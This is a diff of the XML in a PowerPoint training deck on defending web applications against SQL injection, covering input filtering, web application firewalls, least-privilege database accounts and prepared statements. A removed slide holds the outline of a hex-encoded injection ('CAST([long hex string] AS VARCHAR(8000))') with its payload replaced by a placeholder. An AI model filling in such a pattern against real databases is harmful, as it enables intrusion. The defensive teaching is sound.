+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>. Web sites must filter </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="1" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>all</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t> user input. Ideally, user data should be filtered for context. For example, e-mail addresses should be filtered to allow only the characters allowed in an e-mail address, phone numbers should be filtered to allow only the characters allowed in a phone number, and so on.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>2. </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="1" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>Use a web application firewall</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>. A popular example is the free, open source module </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+                <a:hlinkClick r:id="rId3"/>
+              </a:rPr>
+              <a:t>ModSecurity</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t> which is available for Apache, Microsoft IIS, and </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>nginx</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t> web servers. ModSecurity provides a sophisticated and ever-evolving set of rules to filter potentially dangerous web requests. Its SQL injection defenses can catch most attempts to sneak SQL through web channels.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>3. </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="1" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>Limit database privileges by context</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>. Create multiple database user accounts with the minimum levels of privilege for their usage environment. For example, the code behind a login page should query the database using an account limited only to the </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>relevent</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t> credentials table. This way, a breach through this channel cannot be leveraged to compromise the entire database.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>4. </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="1" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>Avoid constructing SQL queries with user input</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="1" i="1" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>. </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>Even data sanitization routines can be flawed. Ideally, using SQL variable binding with prepared statements or stored procedures is much safer than constructing full queries.</a:t>
+            </a:r>
           </a:p>
           <a:p>
             <a:endParaRPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
@@ -16254,7 +16391,7 @@
                 </a:solidFill>
               </a:rPr>
               <a:pPr/>
-              <a:t>Wednesday, April 29, 2015</a:t>
+              <a:t>Monday, May 04, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0">
               <a:solidFill>
@@ -16348,7 +16485,7 @@
         </p:nvSpPr>
         <p:spPr bwMode="auto">
           <a:xfrm>
-            <a:off x="125944" y="1018034"/>
+            <a:off x="125944" y="857775"/>
             <a:ext cx="8720218" cy="1143000"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
@@ -16504,7 +16641,7 @@
                 <a:latin typeface="Constantia"/>
                 <a:cs typeface="Constantia"/>
               </a:rPr>
-              <a:t>Summary</a:t>
+              <a:t>Tips</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" sz="4000" dirty="0">
               <a:latin typeface="Constantia"/>
@@ -16523,8 +16660,8 @@
         </p:nvSpPr>
         <p:spPr bwMode="auto">
           <a:xfrm>
-            <a:off x="457200" y="2547533"/>
-            <a:ext cx="8229600" cy="3361133"/>
+            <a:off x="457200" y="1781667"/>
+            <a:ext cx="8229600" cy="4721048"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -16719,12 +16856,12 @@
               <a:buChar char="•"/>
             </a:pPr>
             <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>Never connect to </a:t>
+              <a:rPr lang="en-US" b="1" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="0070C0"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>Validation first </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0" smtClean="0">
@@ -16732,14 +16869,103 @@
                   <a:schemeClr val="tx1"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>database as super user =&gt; limited privileges</a:t>
-            </a:r>
+              <a:t>(mail, phone,… types)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>Check/Change </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2200" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>input </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>type: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2200" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>is_numeric</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>(), </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2200" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>settype</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>()</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" i="1" dirty="0">
+              <a:solidFill>
+                <a:schemeClr val="tx1"/>
+              </a:solidFill>
+            </a:endParaRPr>
           </a:p>
           <a:p>
             <a:pPr marL="342900" indent="-342900" algn="l">
               <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
               <a:buChar char="•"/>
             </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" b="1" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="0070C0"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>W</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:srgbClr val="0070C0"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>eb app firewall</a:t>
+            </a:r>
             <a:endParaRPr lang="en-US" dirty="0">
               <a:solidFill>
                 <a:schemeClr val="tx1"/>
@@ -16747,17 +16973,65 @@
             </a:endParaRPr>
           </a:p>
           <a:p>
+            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:hlinkClick r:id="rId3"/>
+              </a:rPr>
+              <a:t>ModSecurity</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:hlinkClick r:id="rId4"/>
+              </a:rPr>
+              <a:t>Imperva</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" sz="2200" dirty="0" smtClean="0">
+              <a:solidFill>
+                <a:schemeClr val="tx1"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" sz="2200" dirty="0" smtClean="0">
+              <a:solidFill>
+                <a:schemeClr val="tx1"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
             <a:pPr marL="342900" indent="-342900" algn="l">
               <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
               <a:buChar char="•"/>
             </a:pPr>
             <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>Use prepared statements with bound </a:t>
+              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:srgbClr val="0070C0"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>Limited privileges</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0" smtClean="0">
@@ -16765,133 +17039,109 @@
                   <a:schemeClr val="tx1"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>variables</a:t>
-            </a:r>
+              <a:t> </a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>Never </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2200" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>connect to </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>DB as </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>super </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>user</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" sz="2200" dirty="0" smtClean="0">
+              <a:solidFill>
+                <a:schemeClr val="tx1"/>
+              </a:solidFill>
+            </a:endParaRPr>
           </a:p>
           <a:p>
             <a:pPr marL="342900" indent="-342900" algn="l">
               <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
               <a:buChar char="•"/>
             </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" b="1" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="0070C0"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>Avoid constructing SQL queries with user input</a:t>
+            </a:r>
             <a:endParaRPr lang="en-US" dirty="0">
               <a:solidFill>
-                <a:schemeClr val="tx1"/>
+                <a:srgbClr val="0070C0"/>
               </a:solidFill>
             </a:endParaRPr>
           </a:p>
           <a:p>
-            <a:pPr marL="342900" indent="-342900" algn="l">
+            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
               <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
               <a:buChar char="•"/>
             </a:pPr>
             <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>Validation first: check </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>input has </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>expected </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>type</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>is_numeric</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>()</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="342900" indent="-342900" algn="l">
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-            </a:pPr>
-            <a:endParaRPr lang="en-US" dirty="0">
-              <a:solidFill>
-                <a:schemeClr val="tx1"/>
-              </a:solidFill>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="342900" indent="-342900" algn="l">
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>Change input type: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>settype</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>()</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" i="1" dirty="0">
-              <a:solidFill>
-                <a:schemeClr val="tx1"/>
-              </a:solidFill>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="342900" indent="-342900" algn="l">
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-            </a:pPr>
+              <a:rPr lang="en-US" sz="2200" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>Use </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>SQL variable binding &amp; prepared statements</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr algn="l"/>
             <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
               <a:solidFill>
                 <a:schemeClr val="tx1"/>

--- a/QSoftVietnam_SlideTemplate2014- Sonvq.pptx
+++ b/QSoftVietnam_SlideTemplate2014- Sonvq.pptx
@@ -5,10 +5,10 @@
     <p:sldMasterId id="2147485495" r:id="rId1"/>
   </p:sldMasterIdLst>
   <p:notesMasterIdLst>
-    <p:notesMasterId r:id="rId26"/>
+    <p:notesMasterId r:id="rId29"/>
   </p:notesMasterIdLst>
   <p:handoutMasterIdLst>
-    <p:handoutMasterId r:id="rId27"/>
+    <p:handoutMasterId r:id="rId30"/>
   </p:handoutMasterIdLst>
   <p:sldIdLst>
     <p:sldId id="256" r:id="rId2"/>
@@ -26,15 +26,18 @@
     <p:sldId id="394" r:id="rId14"/>
     <p:sldId id="395" r:id="rId15"/>
     <p:sldId id="396" r:id="rId16"/>
-    <p:sldId id="397" r:id="rId17"/>
-    <p:sldId id="398" r:id="rId18"/>
-    <p:sldId id="401" r:id="rId19"/>
-    <p:sldId id="388" r:id="rId20"/>
-    <p:sldId id="392" r:id="rId21"/>
-    <p:sldId id="393" r:id="rId22"/>
-    <p:sldId id="399" r:id="rId23"/>
-    <p:sldId id="400" r:id="rId24"/>
-    <p:sldId id="333" r:id="rId25"/>
+    <p:sldId id="398" r:id="rId17"/>
+    <p:sldId id="401" r:id="rId18"/>
+    <p:sldId id="397" r:id="rId19"/>
+    <p:sldId id="403" r:id="rId20"/>
+    <p:sldId id="404" r:id="rId21"/>
+    <p:sldId id="405" r:id="rId22"/>
+    <p:sldId id="388" r:id="rId23"/>
+    <p:sldId id="392" r:id="rId24"/>
+    <p:sldId id="393" r:id="rId25"/>
+    <p:sldId id="399" r:id="rId26"/>
+    <p:sldId id="400" r:id="rId27"/>
+    <p:sldId id="333" r:id="rId28"/>
   </p:sldIdLst>
   <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
   <p:notesSz cx="6858000" cy="9144000"/>
@@ -235,7 +238,7 @@
             <a:fld id="{AEC239D8-9946-CA43-8D24-8F75F9EC746F}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:pPr/>
-              <a:t>28/04/2015</a:t>
+              <a:t>06/05/2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -403,7 +406,7 @@
             <a:fld id="{30D3C4F2-547F-4EAC-A4FB-1991884D518B}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:pPr/>
-              <a:t>28/04/2015</a:t>
+              <a:t>06/05/2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -986,11 +989,6 @@
               </a:rPr>
               <a:t>For a free form fields =&gt; a bad idea</a:t>
             </a:r>
-            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
-              <a:solidFill>
-                <a:schemeClr val="tx1"/>
-              </a:solidFill>
-            </a:endParaRPr>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -1162,11 +1160,6 @@
               </a:rPr>
               <a:t>framework</a:t>
             </a:r>
-            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
-              <a:solidFill>
-                <a:schemeClr val="tx1"/>
-              </a:solidFill>
-            </a:endParaRPr>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -3250,7 +3243,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1492901293"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4001900165"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -3304,84 +3297,93 @@
           <a:bodyPr/>
           <a:lstStyle/>
           <a:p>
-            <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
-              <a:lnSpc>
-                <a:spcPct val="100000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buClrTx/>
-              <a:buSzTx/>
-              <a:buFontTx/>
-              <a:buNone/>
-              <a:tabLst/>
-              <a:defRPr/>
+            <a:pPr marL="342900" indent="-342900" algn="l">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
             </a:pPr>
             <a:r>
-              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:effectLst/>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>CAST(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t>[long hex string] </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:effectLst/>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>AS</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:effectLst/>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>VARCHAR(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t>8000</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:effectLst/>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>));</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
+              <a:rPr lang="en-US" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>mysql_query</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="342900" indent="-342900" algn="l">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
+              <a:solidFill>
+                <a:schemeClr val="tx1"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
